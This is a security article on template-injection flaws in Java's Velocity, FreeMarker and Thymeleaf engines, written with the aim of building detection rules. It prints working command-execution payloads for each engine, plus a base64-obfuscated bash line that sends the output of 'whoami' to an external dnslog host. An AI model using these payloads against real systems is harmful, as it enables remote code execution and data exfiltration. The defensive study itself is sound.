Analyzing Java Template Engine Injection Vulnerabilities and Building Automated Detection Capabilities

1. Introduction

Security detection capabilities are a critical part of enterprise security operations, especially for automated vulnerability detection and threat‑traffic identification. This article describes a practice of building detection capabilities based on payloads extracted from template‑engine injection vulnerabilities, following the ATT&CK knowledge base.

2. Vulnerability Exploitation Analysis

2.1 Velocity

Apache Velocity is a Java‑based template engine. Its syntax uses # for directives and $ for variables. The following payload exploits the evaluate method to execute arbitrary commands:

payload：%23set($e="e");$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc")

By sending the payload to /ssti/velocity?template= , the command is executed via the Runtime class.

2.2 FreeMarker

FreeMarker is a Java template engine used to generate HTML, emails, configuration files, etc. Injection is achieved through the freemarker.template.utility.Execute class:

<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("calc") }

The payload is submitted via a template request, causing the command to run.

2.3 Thymeleaf

Thymeleaf is the default template engine for Spring Boot. Two injection methods are demonstrated:

payload:__$%7bnew java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc%22).getInputStream()).next()%7d__::.x
payload:__$%7BT(java.lang.Runtime).getRuntime().exec(%22calc%22)%7D__::.x

Both payloads leverage the SPEL expression processor to execute the calc command.

3. Detection Capability Generation

By extracting the payloads from the three template engines, we can create automated vulnerability detection rules and security‑operation threat detection capabilities. Since direct command execution cannot be observed, the payloads are transformed to trigger DNS‑log requests for verification.

curl `whoami`.8uuq15.dnslog.cn
Y3VybCBgd2hvYW1pYC44dXVxMTUuZG5zbG9nLmNu
bash -c {echo,Y3VybCBgd2hvYW1pYC44dXVxMTUuZG5zbG9nLmNu}|{base64,-d}|{bash,-i}

Adjusted payload examples for DNS‑log detection:

Velocity: %23set($e="e");$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("bash -c {echo,Y3VybCBgd2hvYW1pYC44dXVxMTUuZG5zbG9nLmNu}|{base64,-d}|{bash,-i}")

FreeMarker: <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("bash -c {echo,Y3VybCBgd2hvYW1pYC44dXVxMTUuZG5zbG9nLmNu}|{base64,-d}|{bash,-i}") }

Thymeleaf: __$%7bnew java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22bash -c {echo,Y3VybCBgd2hvYW1pYC44dXVxMTUuZG5zbG9nLmNu}|{base64,-d}|{bash,-i}%22).getInputStream()).next()%7d__::.x

3.1 Security Operation Detection

Using the extracted payload patterns, detection rules can be created (e.g., for FreeMarker injection) to generate alerts when matching traffic is observed.

3.2 Security Defense

When a vulnerability is detected, developers can apply the corresponding fix, and security engineers can verify the remediation. For active attacks, security devices can block the malicious traffic and initiate incident response.

4. Conclusion and Outlook

Based on the ATT&CK framework, we have generated detection capabilities for individual template‑engine vulnerabilities. Future work aims to correlate multiple alerts across attack stages to automatically reconstruct full attack chains, improving the efficiency of security analysis and response.